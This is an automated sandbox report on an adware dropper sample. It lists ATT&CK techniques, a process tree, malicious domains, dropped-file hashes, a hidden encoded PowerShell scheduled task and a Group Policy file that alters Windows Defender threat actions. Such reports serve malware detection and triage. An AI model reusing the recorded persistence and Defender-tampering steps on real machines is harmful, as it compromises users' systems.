Archive Collected Data		Exfiltration Over Bluetooth1
Non-Application Layer Protocol		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts11
Scheduled Task/Job		Logon Script (Windows)Logon Script (Windows)1
Modify Registry		Security Account Manager41
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
Native API		Logon Script (Mac)Logon Script (Mac)41
Virtualization/Sandbox Evasion		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud Accounts2
PowerShell		Network Logon ScriptNetwork Logon Script11
Process Injection		LSA Secrets4
File and Directory Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common11
Deobfuscate/Decode Files or Information		Cached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items2
Obfuscated Files or Information		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
File Deletion		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 780219 Sample: file.exe Startdate: 08/01/2023 Architecture: WINDOWS Score: 100 90 www.testupdate.info 2->90 92 files.testupdate.info 2->92 94 4 other IPs or domains 2->94 106 Snort IDS alert for network traffic 2->106 108 Antivirus detection for dropped file 2->108 110 Multi AV Scanner detection for dropped file 2->110 114 4 other signatures 2->114 11 file.exe 7 2->11         started        14 jKHLerL.exe 8 2->14         started        17 powershell.exe 12 2->17         started        19 gpscript.exe 2->19         started        signatures3 112 Performs DNS queries to domains with low reputation 90->112 process4 file5 82 C:\Users\user\AppData\Local\...\Install.exe, PE32 11->82 dropped 21 Install.exe 4 11->21         started        84 C:\Windows\Temp\...\rwZEaTv.exe, PE32 14->84 dropped 122 Antivirus detection for dropped file 14->122 124 Multi AV Scanner detection for dropped file 14->124 126 Very long command line found 14->126 25 powershell.exe 9 14->25         started        27 gpupdate.exe 1 17->27         started        29 conhost.exe 17->29         started        signatures6 process7 file8 80 C:\Users\user\AppData\Local\...\Install.exe, PE32 21->80 dropped 116 Multi AV Scanner detection for dropped file 21->116 31 Install.exe 10 21->31         started        118 Uses cmd line tools excessively to alter registry or file data 25->118 35 cmd.exe 25->35         started        37 conhost.exe 25->37         started        39 reg.exe 25->39         started        43 12 other processes 25->43 41 conhost.exe 27->41         started        signatures9 process10 file11 86 C:\Users\user\AppData\Local\...\jKHLerL.exe, PE32 31->86 dropped 88 C:\Windows\System32behaviorgraphroupPolicy\gpt.ini, ASCII 31->88 dropped 96 Antivirus detection for dropped file 31->96 98 Multi AV Scanner detection for dropped file 31->98 100 Uses schtasks.exe or at.exe to add and modify task schedules 31->100 102 Modifies Group Policy settings 31->102 45 forfiles.exe 1 31->45         started        47 forfiles.exe 1 31->47         started        49 schtasks.exe 2 31->49         started        53 3 other processes 31->53 104 Uses cmd line tools excessively to alter registry or file data 35->104 51 reg.exe 35->51         started        signatures12 process13 process14 55 cmd.exe 1 45->55         started        58 conhost.exe 45->58         started        60 cmd.exe 1 47->60         started        62 conhost.exe 47->62         started        64 conhost.exe 49->64         started        66 conhost.exe 53->66         started        68 conhost.exe 53->68         started        70 conhost.exe 53->70         started        signatures15 120 Uses cmd line tools excessively to alter registry or file data 55->120 72 reg.exe 1 1 55->72         started        74 reg.exe 1 55->74         started        76 reg.exe 1 1 60->76         started        78 reg.exe 1 60->78         started        process16

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe37%ReversingLabsWin32.Adware.Neoreklami

Dropped Files

SourceDetectionScannerLabelLink
C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exe100%AviraHEUR/AGEN.1209690
C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe100%AviraHEUR/AGEN.1209690
C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe100%AviraHEUR/AGEN.1209690
C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exe40%ReversingLabsWin32.Adware.Neoreklami
C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe40%ReversingLabsWin32.Adware.Neoreklami
C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe40%ReversingLabsWin32.Adware.Neoreklami
C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exe40%ReversingLabsWin32.Adware.Neoreklami

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
30.0.jKHLerL.exe.9c0000.0.unpack100%AviraHEUR/AGEN.1209690Download File
30.2.jKHLerL.exe.9c0000.0.unpack100%AviraHEUR/AGEN.1209690Download File
2.2.Install.exe.fb0000.0.unpack100%AviraHEUR/AGEN.1209690Download File
2.0.Install.exe.fb0000.0.unpack100%AviraHEUR/AGEN.1209690Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://crl.micr0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
env-3936544.jcloud.kz
185.22.66.105
truefalse
    		unknown
    d1u0l9f6kr1di3.cloudfront.net
    		108.139.241.167
    		truefalse
      		high
      checkdata-1114476139.us-west-2.elb.amazonaws.com
      		54.191.228.37
      		truefalse
        		high
        api4.check-data.xyz
        		unknown
        		unknowntrue
          		unknown
          files.testupdate.info
          		unknown
          		unknowntrue
            		unknown
            www.testupdate.info
            		unknown
            		unknowntrue
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000012.00000002.501402298.0000021273F0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.356255986.00000212640A3000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://crl.micrpowershell.exe, 00000012.00000002.346158647.0000021262345000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000012.00000002.346924306.0000021263EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.422985802.00000000036E1000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.356255986.00000212640A3000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.356255986.00000212640A3000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000012.00000002.501402298.0000021273F0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        World Map of Contacted IPs

                        No contacted IP infos

                        General Information

                        Joe Sandbox Version:36.0.0 Rainbow Opal
                        Analysis ID:780219
                        Start date and time:2023-01-08 16:14:36 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 11m 15s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:file.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:58
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@91/15@9/0
                        EGA Information:
                        • Successful, ratio: 40%
                        HDC Information:
                        • Successful, ratio: 99.2% (good quality ratio 97%)
                        • Quality average: 84.7%
                        • Quality standard deviation: 22.7%
                        HCA Information:
                        • Successful, ratio: 62%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): Conhost.exe, SgrmBroker.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, clients2.google.com, settings-win.data.microsoft.com, www.googleapis.com, service-domain.xyz
                        • Execution Graph export aborted for target powershell.exe, PID 2812 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        16:15:54API Interceptor1x Sleep call for process: Install.exe modified
                        16:15:55Task SchedulerRun new task: gYzDOohkP path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                        16:15:59Task SchedulerRun new task: bltLOfaNnqcomuNOFZ path: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe s>6Q /site_id 525403 /S
                        16:16:12API Interceptor32x Sleep call for process: powershell.exe modified
                        16:17:11API Interceptor1x Sleep call for process: jKHLerL.exe modified
                        16:17:14Task SchedulerRun new task: kOcpmnESeqewMbTZr path: C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exe s>hN /site_id 525403 /S
                        16:17:20Task SchedulerRun new task: HzHABnovkxKFv2 path: C:\Windows\system32\wscript.exe s>"C:\ProgramData\mEVMengxDstWhUVB\tMOESiP.wsf"

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):0.9260988789684415
                        Encrypted:false
                        SSDEEP:3:Nlllulb/lj:NllUb/l
                        MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                        SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                        SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                        SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                        Malicious:false
                        Preview:@...e................................................@..........

                        C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exe

                        Download File
                        Process:C:\Users\user\Desktop\file.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:modified
                        Size (bytes):6589133
                        Entropy (8bit):7.9960786987720285
                        Encrypted:true
                        SSDEEP:196608:91OU9ZlYnpgRqDhjblZ7SVlH2tkAtEpVngOcJPjN:3OU9LcpgihL+PcvEpVn2JPx
                        MD5:27C94EBEBB6A848899409651E1C2B93D
                        SHA1:17F32BC140AFB129F7E89DB5108C97FFD14C47B3
                        SHA-256:D0BED1FBBCE5E9CB76A64B94E660D8D8854E2F5B0A89AD14EAFE08A6D063CE59
                        SHA-512:94659DCA2582D5ADA25206787708FFED3BF27B0B7A343B3D696A452EC8A968C68932E3463C5E25A686BA707C3CB560AEE8011A8D438870BD99BD73556E221906
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 40%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\7zSD636.tmp\__data__\config.txt

                        Download File
                        Process:C:\Users\user\Desktop\file.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):892776
                        Entropy (8bit):7.999778490317724
                        Encrypted:true
                        SSDEEP:24576:lApaQSS5wMqfkF6DKvXnh1hXA+6IcLoNN:lUFSS5xgDEXnhfA/IcLoz
                        MD5:1368A0D5D0EDC684013D544383097F49
                        SHA1:56E1F262521A0556CA8DBD185E75E941324495CB
                        SHA-256:86DE823E968C3E66F79C70E024AEF9D639000025F9B0E5681980A3DAC66C7541
                        SHA-512:574500A23CA55AFC1AA231EB6617CF1DFDAB13D4EBA1870C17F0A56F8DA6CCD7249FE86DC825FF931914D3FC81D270547A41913CDA71F7BA879B43E49FC6BC6D
                        Malicious:false
                        Preview:..J.$.M3+P.z.......Y.!..#.....4 J.xs..<..s.r....r.t.,>.......D.:.~.j.Fz.H.z..}..&..8e.j..Y....\..v..h../<..#1.."..S.6..TY[....ivQp.3KR.^m.z.Hx.D .3F?*v_U}l.IM.%qi.O...%..SQ..5......\ek...h... :~J8I...D..AI."...mA..<H......m:..v..._. ..+|.:..y1R...loP`.......=$o.*..Uo....X.....,._.-3.. ;_..&.9:..R3g...6:.I.u.....i..f..B._-|.}.rZHER...Tj...!~.|....5.h...H.Z.w.+.6..1..;..%a...........aM.........o....j.Hj9...7...LL7....._pbs...@..9....6T.....f...}../...So........}..:qS...z....!.&&..X......ugS.).{......~IU......:..e..........qU..Y............:.&ys.h9G...4c\....N..-.].Qk..^Z.......x.K...S.]..3?".$.A.9..K.O..m.i.0^o^*.W...Yl*..i.Z...t;S..y./}S..f~..k......b...'...=%%....0.e0..Q...z.........@.h.F..HD.m9.kNV..c'.|.*.._e.......kT...a.a...J,J..Dj.h/5t.oypp:.~...3..5).A6...f.SW..OM:.<3..a.....{Rg..:a?]...%q8i..<.&.........{.y...%....j.U...d.2.P.I..ReZt...].r..7}o...vg.R.|Y-s..,1/.G.t.k...PBH.9.Z..'..s0.JV..k.W'.<....w...z....7.Rp..;..;+(c......1..VmE.

                        C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:modified
                        Size (bytes):7106560
                        Entropy (8bit):7.695564139109479
                        Encrypted:false
                        SSDEEP:98304:nM3892idwFkTWXnfVlk7hgn+VUumSl/icQb8yvfx08Izds/F/7z4MnStXYZhK+:nfRpyXntq2nuRr/iZfx3IBODjnxZU
                        MD5:FF818A3F7A85439624F8E4FDA13889C6
                        SHA1:97B4573915FABFD6F5A317B7A0B3B668D9DE30FC
                        SHA-256:6267F16C7A74D8C26F6D6CBE39E28044F55ECF16D82CBDFFBC1EFD3625393C42
                        SHA-512:88731282343DF42EDE03BF0BA7CBD16AE113A4116C0A65A99B01D1A55B4A6F8498C1D9133BFF91A754F09395E49B0C64DBB855691E9F86B74ADAF2F79BD6BCA2
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 40%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%$..aE..aE..aE..l...JE..l.7.&E..l.6.E.....jE..aE..DD....3.dE..l...`E......`E..RichaE..........................PE..L...qVC^.....................Z.......:............@..........................P........l...@..................................d..x.......:u.......................M..................................@nk.@............`...............................text............................... ..`.data....v........[.................@....idata.......`........k.............@..@.rsrc...:u.......v....k.............@..@.reloc...M.......N..."l.............@..B........................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_35yenhmn.spf.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltx2gjbg.j3a.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):7106560
                        Entropy (8bit):7.695564139109479
                        Encrypted:false
                        SSDEEP:98304:nM3892idwFkTWXnfVlk7hgn+VUumSl/icQb8yvfx08Izds/F/7z4MnStXYZhK+:nfRpyXntq2nuRr/iZfx3IBODjnxZU
                        MD5:FF818A3F7A85439624F8E4FDA13889C6
                        SHA1:97B4573915FABFD6F5A317B7A0B3B668D9DE30FC
                        SHA-256:6267F16C7A74D8C26F6D6CBE39E28044F55ECF16D82CBDFFBC1EFD3625393C42
                        SHA-512:88731282343DF42EDE03BF0BA7CBD16AE113A4116C0A65A99B01D1A55B4A6F8498C1D9133BFF91A754F09395E49B0C64DBB855691E9F86B74ADAF2F79BD6BCA2
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 40%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%$..aE..aE..aE..l...JE..l.7.&E..l.6.E.....jE..aE..DD....3.dE..l...`E......`E..RichaE..........................PE..L...qVC^.....................Z.......:............@..........................P........l...@..................................d..x.......:u.......................M..................................@nk.@............`...............................text............................... ..`.data....v........[.................@....idata.......`........k.............@..@.rsrc...:u.......v....k.............@..@.reloc...M.......N..."l.............@..B........................................................................................................................................................................................................................................................................................................................

                        C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12180
                        Entropy (8bit):5.377688763891521
                        Encrypted:false
                        SSDEEP:192:ttH+KvFe9Igt5bg7Ft1LH2DAsbCEBO8SVFEJ+aNK1ey9kN4rI:ttecnUuF709Z1SVOyrI
                        MD5:C3447D21CF7D38B62680CD6477FEA0AF
                        SHA1:E1B22F3CA8CC1117BE4D8EB746EDA0B8B851383D
                        SHA-256:757711BCB7907D2DE5B19C8F0A03134EF3C902FFD7E5933C78EF6C4ED10A8E60
                        SHA-512:099B06564D717CDA099FDD471A51E6A97AFC4346B078B7D134D8B42C887E82DDC7964ACA1BEB9653856A9BD5358D81F2EE69CDA4FADA737B64178C2E0459B9AA
                        Malicious:false
                        Preview:@...e...........................................................H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.Configuration........................................T.@..>@...@.V.@.H.@.X.@.....Xd@.Vd@..*@.[.@.NT@.HT@..S@..S@.hT@..S@..S@..S@.\.@..T@..T@.@X@.?X@..T@..S@.

                        C:\Windows\System32\GroupPolicy\Machine\Registry.pol

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe
                        File Type:RAGE Package Format (RPF),
                        Category:dropped
                        Size (bytes):4494
                        Entropy (8bit):3.5285899929693714
                        Encrypted:false
                        SSDEEP:96:W9H9h9j9n9a9K9o92939l9S9nyJ0B0G0w0i0S0Y0zJ0we:z
                        MD5:CF423AF663C1AFA87A41A1B02C5B9E47
                        SHA1:897220B5E15C2905A1062AB6322E12BC91DE0A74
                        SHA-256:6A466156CAF25ACDA86D68DC467E2DFF1060BFFC0BCFB71D48FB4AA6679D7D2A
                        SHA-512:111BDB31AC5A6C1ED23D6F8EB9CA992BB3FF8A11B40A01BE46562CC2232BE49BB9083F40E94681F3CE7C592377BAE7082F5FFA313B862FEAD758F931F74DBFFE
                        Malicious:false
                        Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s...;.T.h.r.e.a.t.s._.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.2.5.4.5.1...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.5.6.5.9.6...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.4.2.8.7.2...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.1.4.7.7.4.9.3.7.3...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.

                        C:\Windows\System32\GroupPolicy\gpt.ini

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):268
                        Entropy (8bit):4.9507895998010145
                        Encrypted:false
                        SSDEEP:6:1QnMzYHxbnPonn3dXsMzYHxbnn/JIAuNhUHdhJg+5Rnn3dzC:1QM0HxbnIV0Hxbn/JnumuuzC
                        MD5:A62CE44A33F1C05FC2D340EA0CA118A4
                        SHA1:1F03EB4716015528F3DE7F7674532C1345B2717D
                        SHA-256:9F2CD4ACF23D565BC8498C989FCCCCF59FD207EF8925111DC63E78649735404A
                        SHA-512:9D9A4DA2DF0550AFDB7B80BE22C6F4EF7DA5A52CC2BB4831B8FF6F30F0EE9EAC8960F61CDD7CFE0B1B6534A0F9E738F7EB8EA3839D2D92ABEB81660DE76E7732
                        Malicious:true
                        Preview:[General].gPCUserExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F73-3407-48AE-BA88-E8213C6761F1}].gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957E-509E-11D1-A7CC-0000F87571E3}{D02B1F72-3407-48AE-BA88-E8213C6761F1}].Version=100001.

                        C:\Windows\Tasks\bltLOfaNnqcomuNOFZ.job

                        Download File
                        Process:C:\Windows\SysWOW64\schtasks.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):550
                        Entropy (8bit):3.6792522334365287
                        Encrypted:false
                        SSDEEP:12:GAWOkXg1Q1uRea3ATM5KkXg1Q1uRegFLkX+VW:V9cUdWLcUBL
                        MD5:A5556DBEE83B03CD91AF96B272C26504
                        SHA1:CBDD9E86A58FB5E0A610D03BEE31AFD6A9B60D50
                        SHA-256:AAC9D52DCCE2808508D3D975012D4B77D206F2A0CD9DCDD0E6D0DEA21B1AA8D9
                        SHA-512:C40B5B6C342CB7F9B2084FF52CCB6701CD39FAA82993C2D1F8F6C4ADCB784E387DB9A76EC076F83CEDC0D76EAAECF6C1869FBF0F298AA538839791F2FD3EA2CF
                        Malicious:false
                        Preview:....N......F.%n1pE.]F.......<... .....s...............................T.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.w.N.H.w.e.p.t.A.d.Y.e.u.L.C.N.u.f.\.u.Z.O.a.P.q.p.y.I.t.v.b.G.V.j.\.j.K.H.L.e.r.L...e.x.e.....6.Q. ./.s.i.t.e._.i.d. .5.2.5.4.0.3. ./.S...H.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.w.N.H.w.e.p.t.A.d.Y.e.u.L.C.N.u.f.\.u.Z.O.a.P.q.p.y.I.t.v.b.G.V.j.....D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.\.f.r.o.n.t.d.e.s.k...................0...............................................

                        C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exe

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):7106560
                        Entropy (8bit):7.695564139109479
                        Encrypted:false
                        SSDEEP:98304:nM3892idwFkTWXnfVlk7hgn+VUumSl/icQb8yvfx08Izds/F/7z4MnStXYZhK+:nfRpyXntq2nuRr/iZfx3IBODjnxZU
                        MD5:FF818A3F7A85439624F8E4FDA13889C6
                        SHA1:97B4573915FABFD6F5A317B7A0B3B668D9DE30FC
                        SHA-256:6267F16C7A74D8C26F6D6CBE39E28044F55ECF16D82CBDFFBC1EFD3625393C42
